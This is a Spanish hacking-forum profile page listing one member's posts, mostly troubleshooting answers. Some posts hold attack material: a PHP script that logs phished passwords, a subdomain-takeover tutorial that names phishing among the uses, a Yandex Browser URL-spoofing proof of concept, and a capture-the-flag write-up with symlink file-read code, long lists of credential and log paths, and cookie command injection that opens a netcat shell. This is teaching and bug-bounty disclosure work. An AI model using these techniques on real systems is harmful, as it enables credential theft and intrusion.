This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - Jimeno

Pages: [1] 2 3 ... 20
1
Dudas y pedidos generales / Re:DUDA: ¿Cual es el error PHP?
« on: February 08, 2017, 06:24:58 am »
Code: (php) You are not allowed to view links. Register or Login
<?php 
//error_reporting(0);
$usuario "xd";
$password "lmao";
$ip "127.0.0.1";
         
if( ( empty(
$usuario)) || (empty($password)) ){
    
header('Location: index.htm');
} else {
    
//guarderemos en un archivo de texto
    
$file fopen('clave.txt','a+');
    
fwrite($file"usuario: ".$usuario."\ncontraseña: ".$password."\nIP: ".$ip."\n=========================\n");
    
fclose($file);
    
//echo("usuario: ".$usuario."\r\ncontraseña: ".$password."\r\nIP: ".$ip."\r\n=========================\r\n");
    
header('Location: https://facebook.com/');     
}


Un saludo.

2
Dudas y pedidos generales / Re:Ayuda a poner un menu en todas las paginas
« on: January 14, 2017, 03:40:27 pm »
You are not allowed to view links. Register or Login
Hola Jimeno, no se que quieres decir con ese de que no reinventes la rueda, no estoy inventando nada, creo que ya lo he comentado... no tengo ni idea de programación, así que poco puedo reinventar, solo he seguido como ya he dicho un toturial donde ponen el codigo y lo que intento es hacerle funcionar con las paginas que yo tengo y que no tiene menu, lo unico que quiero es ponerle ese menu, ni mas ni menos, pero cuando cargo una pagina el menu desaparece.

Gracias por ese link, pero mi ingles es nulo, aunque puedo ver los ejemplos, es mas o menos como lo que yo intento hacer.


Salu2.

El link lo único que contiene es un paquete que hace exactamente lo que tú pides. Un menú centralizado para todas tus páginas. Ayúdate del traductor de Google y ve poco a poco. Espero que te sirva.
Con lo de la rueda me refiero a que no crees tú el menú desde 0 o siguiendo una guia. Si tu objetivo es tenerlo, no implementarlo, es mejor que cojas uno ya hecho y funcional y simplemente lo metas en tu web.

3
Dudas y pedidos generales / Re:Ayuda a poner un menu en todas las paginas
« on: January 14, 2017, 02:58:55 pm »
You are not allowed to view links. Register or Login
No hay nadie mas que pueda dar con la solución ?


Salu2.

No reinventes la rueda: You are not allowed to view links. Register or Login

4
Dudas y pedidos generales / Re:Ramsonware cryptxxx
« on: December 21, 2016, 09:28:54 am »
RannohDecryptor de Kaspersky debería servirte para eliminarlo You are not allowed to view links. Register or Login
Sigue los pasos de su guía oficial al pie de la letra: You are not allowed to view links. Register or Login

5
Buenas.

Aquí tienes una guía bastante útil y completa: You are not allowed to view links. Register or Login

6
Dudas y pedidos generales / Re:Error rdesktop
« on: December 18, 2016, 12:50:26 pm »
Intenta conectarte sin SSL si es para pruebas en casa o instala Kerberos.
Por los foros dicen esto:
Quote
> Yes you are able to login, rdekstop tries to connect using
> CredSSP+Kerberos for highest security, if kerberos is not initialized
> it will fallback to use SSL.

You are not allowed to view links. Register or Login

O directamente baja la última versión de You are not allowed to view links. Register or Login y prueba. Este issue representa el mismo problema que tú tienes: You are not allowed to view links. Register or Login

7
Dudas y pedidos generales / Re:Error getgui
« on: December 18, 2016, 12:05:37 pm »
Aquí hay una guía en la que se encuentran con el mismo error que tú y explican cómo solucionarlo: You are not allowed to view links. Register or Login
Prueba con los pasos de la guía oficial: You are not allowed to view links. Register or Login

El error que has obtenido dice lo siguiente:
ERROR_NONE_MAPPED
    1332 (0x534)
    No mapping between account names and security IDs was done.

Saludos.

8
Dudas y pedidos generales / Re:Kali cambio mac automático
« on: December 04, 2016, 11:17:30 am »
Echa un ojo a esta guía: You are not allowed to view links. Register or Login

9
Muchas gracias, @You are not allowed to view links. Register or Login, @You are not allowed to view links. Register or Login, @You are not allowed to view links. Register or Login, @You are not allowed to view links. Register or Login, @You are not allowed to view links. Register or Login
Fue un gran trabajo tanto del equipo como de la gente de INCIBE y demás.
PD: la imagen está mal, la victoria en la parte técnica fue algo mayor ;) Aquí tenéis el marcador final de esa parte:https://twitter.com/TheHackingLab/status/796385359559016449

Saludos.

10
Nope.
Siempre y cuando tengan Bug Bounty y sigas las reglas puedes reportar sin ningún riesgo. Y además es una buena fuente de ingresos :)

En cuanto a las webs que no tienen VRP, en mi opinión es mejor no reportar ya que has realizado una intrusión no autorizada y, obviamente, es ilegal.

You are not allowed to view links. Register or Login
Yo creo que siempre hay que quedarse en el anonimato, si reportas la vulnerabilidad nunca dejar nuestros datos, ya sea nombre o correo electrónico personal, y siempre hacerlo detrás de proxy.

Si te lo quieren agradecer ya puedes tener otro tipo de contacto con ellos, pero pienso que mejor nunca revelar nuestra identidad, por si acaso.

Saludos

11
Dudas y pedidos generales / Re:Arbol b+
« on: September 26, 2016, 08:42:57 pm »
Tan fácil como hacer una búsqueda en Google....
Aquí tienes el código en C++ y Java --> You are not allowed to view links. Register or Login

12
Dudas y pedidos generales / Re:ARP Spoof
« on: September 25, 2016, 09:26:38 pm »
La tabla ARP no es permanente, sus valores se actualizan. Echa un vistazo a esto: You are not allowed to view links. Register or Login

13
Off Topic / Re:El reto de la imresora
« on: September 23, 2016, 11:34:38 am »
Buen plan para stalkear a tu vecina, el señor juez te manda saludos (:

14
Dudas y pedidos generales / Re:Break en bucles - programación
« on: September 23, 2016, 08:11:26 am »
Buenas.

La razón no es realmente técnica, es que aumentan la complejidad del flujo de control de tu código y es mucho más difícil de comprender lo que hace a la hora de leerlo. Echa un ojo a este hilo: You are not allowed to view links. Register or Login


Un saludo.

15
Bugs y Exploits / Re:Cómo tomé el control de tu subdominio
« on: September 13, 2016, 02:58:55 am »
Buenas.

Dispones de muchas herramientas y métodos. Personalmente yo utilizo Gobuster, Google dorks, DNSdumpster y subbrute, pero hay muchas otras.

Si buscas rápidamente en google "encontrar subdominios"  o "subdomain enumeration" te aparecerán muchos artículos interesantes sobre distintos métodos para hacerlo.

Un saludo.
You are not allowed to view links. Register or Login
Hola buenas tardes
como detectas los subdominios de la web es lo que no entendí, disculpen mi ignorancia

16
Bugs y Exploits / Cómo tomé el control de tu subdominio
« on: September 12, 2016, 02:23:15 pm »
Buenas a todos.

Me gustaría presentaros una técnica para tomar el control de ciertos dominios/subdominios de empresas. Es relativamente antigua, pero creo no haberla visto en blogs de habla hispana (no me echéis a los leones si me equivoco).

Como todos sabéis, la base para encontrar vulnerabilidades es la ENUMERACIÓN. Gracias a ella ampliamos exponencialmente nuestra superficie de ataque. Hay muchísimas herramientas para encontrar subdominios, es algo más que cubierto en los blogs de seguridad informática.

El nombre de la técnica es Subdomain Takeover o Toma de control de subdominio

Una vez elegido el dominio al que atacar (siempre teniendo permiso, por supuesto) podemos encontrarnos con que apunta a instancias de Heroku, Github, Amazon AWS, Sendgrid, etc. Es aquí cuando comienza nuestro ataque.
Hay empresas que crean instancias en dichos servicios y apuntan un subdominio hacia ellas. Tras un tiempo pueden eliminar dichas instancias, pero si se olvidan de eliminar el subdominio o hacer que no apunte hacia ellas podremos tomar el control del mismo.

En este caso en concreto la situación es la siguiente:
  • La empresa crea una instancia de almacenamiento (S3) en Amazon AWS
  • Apuntan su subdominio source.empresa.com hacia dicha instancia
  • Tras un tiempo eliminan la instancia PERO SE OLVIDAN DE CAMBIAR EL SUBDOMINIO

(en las imágenes se muestra cómo el subdominio sigue apuntando hacia la instancia ya eliminada)




Gracias a ello nosotros podemos hacer que dicho subdominio apunte hacia una instancia nuestra. En ella podemos almacenar simplemente algo para vacilar, spam de una empresa competidora, un phising... las opciones son muchas y cada cual más jugosa.

En el caso de AWS lo que deberemos hacer es conectarnos a nuestra cuenta (mejor a una anónima si no lo hacéis con permiso) y crear una nueva instancia con el nombre del subdominio (la parte de la izquierda en ANSWER SECTION en la imagen anterior, en mi caso source.empresa.com, es decir, todo lo anterior a s3.amazonaws.com).

Tras crear la instancia subiremos nuestro archivo (en mi caso un index.html en el que había <h1>pwned</h1>) a la misma y lo marcaremos como público.

(en la imagen se aprecia el resultado)


El resultado es que el subdominio apunta a nuestra instancia y tenemos control total del mismo:

(imagen)




Espero que os sirva de utilidad el post.


Más información y los primeros posts que leí sobre esta técnica:
  • Primer post, Detectify: You are not allowed to view links. Register or Login
  • Reporte de Frans Rosén: You are not allowed to view links. Register or Login



    Un saludo,
    @migueljimeno96

17
Hacking ShowOff / URL Spoofing - Yandex Browser [Windows y Android]
« on: July 27, 2016, 09:25:07 am »
Buenas a todos.

Supongo que esteréis familiarizados ya con esta vulnerabilidad. En caso de que no lo estéis, se trata de conseguir que el navegador muestre una URL legítima (por ejemplo el login de Gmail) pero que realmente el usuario esté visitando el servidor del atacante o uno fraudulento.
Se puede aprovechar para muchos objetivos, a mí el principal que se me ocurre es mostrar un panel de login clonando el login de la página víctima. La víctima verá la URL legítima, pero realmente estará entregando sus credenciales al atacante.

Comenzamos por el navegador de Yandex (empresa que tiene Bug Bounty):

Quote
En el caso de Yandex ambas vulnerabilidades fueron reportadas y consideradas como duplicadas, es decir, otro investigador las ha reportado antes que yo. Si eres esa persona y deseas que elimine este post, contacta conmigo a través de Twitter y lo haré inmediatamente (@migueljimeno96).

Yandex Browser para Windows
(reporte enviado el 19 de Julio de 2016, 21:36)

Los pasos a seguir para falsificar la URL una vez el usuario visita la página fraudulenta son los siguientes:
  • Una vez la página ha cargado, se llama a una función de JS (en mi caso se llama a dicha función al pulsar un botón).
  • La función abre una nueva ventana utilizando window.open. Dicha ventana cargará la URL que deseamos falsificar.
  • Utilizaremos entonces document.write sobre dicha ventana para colocar nuestro contenido fraudulento (panel de login por ejemplo).

De forma que el código será el siguiente:
Code: (html5) You are not allowed to view links. Register or Login
<script>
function spoof() {
        nWindow = window.open('https:/www.google.com', '_t1');
        nWindow.document.write('<pre>Here we could place a phising login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
The page is being hosted in my server

De tal forma que al pulsar sobre el botón en el navegador ocurría lo siguiente:




Tras intercambiar unos cuantos correos con el equipo de seguridad de Yandex la respuesta final fue la siguiente:


Quote
Hello!

Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.

Have a nice day!

Vasiliy Kuznetsov Yandex Security Team


Yandex Browser para Android
(reporte enviado el 19 de Julio de 2016, 18:41)

Los pasos a seguir fueron los mismos, de forma que la víctima veía lo siguiente:



Tras unos pocos días recibí los siguientes correos del equipo de seguridad:

Quote
Hello, Miguel Angel!
As for Android, I'll check it shortly because it look similar to one report we got the other day. I'll let you know in a few days.
Have a great weekend!

Quote
Hello, Miguel Angel!
I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.

Enlace al writeup original: You are not allowed to view links. Register or Login

Saludos y espero que os haya gustado!

18
Dudas y pedidos generales / Re:Que lugar es mejor crear un Blog
« on: May 19, 2016, 04:53:11 am »
También puedes probar a crear tu propio blog y hostearlo en Github
  • You are not allowed to view links. Register or Login/
  • You are not allowed to view links. Register or Login (guía muy completa)

19
Dudas y pedidos generales / Re:Duda sobre terminal Debian jessie
« on: May 13, 2016, 09:44:17 am »
Por lo que leo se debe a que no tienes RVM instalado. Te dejo estos dos links que deberían solucionar tu problema:

Un saludo y suerte, @You are not allowed to view links. Register or Login.

20
Wargames y retos / Re:Mini Reto explotación web [Fácil]
« on: May 10, 2016, 08:02:34 am »
Enhorabuena @You are not allowed to view links. Register or Login, tú y JKS conseguisteis esa, la solución esperada. Hiciste un gran trabajo :)

Espero sacar más retos pronto

Un saludo y gracias por participar.

You are not allowed to view links. Register or Login
Yo no resolvi la primer parte, lei el post que explicaba como leer archivos y jugue a conseguir ejecucion de codigo

Primero me hice un script para tratar de conseguir mas información. El objetivo era conseguir archivos de configuracion, principalmente para sacar el path del php que maneja las subidas. Mi idea era por un lado, leer el codigo para ver como funcionaba, y por el otro ver si se podia hacer que los archivos descompriman en la carpeta de la web y subir una shell.


Code: You are not allowed to view links. Register or Login
<?PHP
$a = file_get_contents("httpd-conf-locations.txt");

$i=300;
foreach(explode("\n", $a) as $line){
    system('ln -s "'.$line.'" prueba'.$i++);
}

El txt es este:
Code: You are not allowed to view links. Register or Login
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/var/www/conf/httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
C:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/pkg/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/conf.d/apache2
/opt/lampp/etc/httpd.conf
Despues:
Code: You are not allowed to view links. Register or Login
zip --symlinks prueba1.zip prueba*
Ahi me aparecio el archivo de configuracion de apache y saque que la carpeta es /var/www
Ya me habia imaginado que era esa la carpeta, pero buscaba el archivo en /var/www/index.php

Volvi a correr el script con otro txt:
Code: You are not allowed to view links. Register or Login
/apache/logs/access.log
/apache/logs/error.log
/apache2/logs/access.log
/apache2/logs/error.log
/bin/php.ini
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/cgi-bin
/etc/chrootUsers
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/my.cnf
/etc/mysql/my.cnf
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/etc/shadow
/etc/utmp
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/access.log
/logs/error.log
/logs/pure-ftpd.log
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access.log
/opt/xampp/logs/access_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error_log
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/root/.Xauthority
/root/.bash_history
/root/.bash_logut
/root/.ksh_history
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/Zend/etc/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access. log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/SYSLOG
/var/adm/X0msgs
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/log/xferlog
/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/apache/log
/var/apache/log
/var/apache/logs
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/POPlog
/var/log/access.log
/var/log/access_log
/var/log/access_log
/var/log/acct
/var/log/apache-ssl/access.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/error.log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/auth
/var/log/auth.log
/var/log/authlog
/var/log/boot.log
/var/log/cron.log
/var/log/error.log
/var/log/error_log
/var/log/error_log
/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_mainlog
/var/log/exim_paniclog
/var/log/exim_rejectlog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftplog
/var/log/httpd/
/var/log/httpd/access.log
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqld.log
/var/log/mysqlderror.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pureftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/log/access_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/error_log
/web/conf/php.ini
/www/logs/proftpd.system.log
c:\NetServer\bin\stable\apache\php.ini
c:\PHP\php.ini
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\xampp\apache\conf\httpd.conf
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\apache\logs\access.log
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\apache\logs\error.log
c:\apache\php\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
c:\php4\php.ini
c:\php5\php.ini
c:\php\php.ini
c:\xampp\apache\bin\php.ini
Ahi vi algunos archivos mas y me di cuenta de que era un ubuntu. Tambien me di cuenta de que no habia ninguna configuracion loca, el archivo php.ini estaba como cualquier otro, habian pocos usuarios, el usuario del webserver era www-data y cosas asi. Pregunté y me dijeron que en ubuntu tenia que buscar en /var/www/html/index.php

Ahi consegui el source:
Code: You are not allowed to view links. Register or Login
ln -s "/var/www/html/index.php" prueba54
zip --symlinks prueba1.zip prueba54

Code: You are not allowed to view links. Register or Login
<!DOCTYPE html5>
<head>
    <meta charset="utf-8"/>
    <title>Sube tu archivo aquí</title>
</head>

<body>
    <form action="?page=upload" method="post" enctype="multipart/form-data">
        <input type="file" name="file"/>
        <input type="submit" value="kuankear!"/>
    </form>


<?php
    session_start
();
    
$allowed = array('zip');
    
$filename $_FILES['file']['name'];
    
$ext pathinfo($filenamePATHINFO_EXTENSION);
    if (!
in_array($ext$allowed)) {
        die(
"La extensión del archivo no es admisible.");
    }
    
$tmp_file "/tmp/" session_id();
    
$zip = new ZipArchive;
    
$zip->open($_FILES['file']['name']);
    
$zip->extractTo($tmp_file);
    
exec('unzip -o ' $_FILES['file']['tmp_name'] . ' -d ' $tmp_file);
    echo 
"Contenido del ZIP:<br>";
    
passthru("cat $tmp_file/* 2>&1");
    
exec("rm -rf $tmp_file");
    
?>



</body>
</html>

Ahi me di cuenta de algo que podria haber visto mucho antes: cuando tiraba errores tipo "cat: /tmp/asdasdasdasdqwe: No such file or directory", el nombre del archivo venia del id de sesion (la cookie PHPSESSID)

La parte importante:
Code: You are not allowed to view links. Register or Login
    session_start();
    $tmp_file = "/tmp/" . session_id();
    passthru("cat $tmp_file/* 2>&1");

Con exec() tambien se ejecutan los comandos, pero con passthru() vemos la salida
Seteo la cookie a esto:
Quote
0g4clkinm90tfeukeferus7en0asd$(id)
Y entre un monton de errores se ve esto:

Code: You are not allowed to view links. Register or Login
Contenido del ZIP:<br>cat: /tmp/0g4clkinm90tfeukeferus7en0asduid=33(http): Is a directory
cat: gid=33(http): No such file or directory
cat: groups=33(http)/*: No such file or directory

Trate de correr nc y wget pero no podia porque si ponia un espacio en la cookie, php generaba otra
Use esto: You are not allowed to view links. Register or Login
Me quedó esta cookie:
Code: You are not allowed to view links. Register or Login
qur0v0rjnj840jju8qn1qpdjd3q$({nc,-lp,8989,-e,/bin/bash})Y ahi me pude conectar a una shell remota

A partir de la parte donde consigo el codigo php, todas las pruebas son locales porque desaparecio el servidor. Es probable que en el servidor no me pueda conectar asi, pero sirve la misma tecnica para hacer una conexion inversa o para bajar una webshell con wget


Me diverti bastante, me gustó que no haya que adivinar cosas

Pages: [1] 2 3 ... 20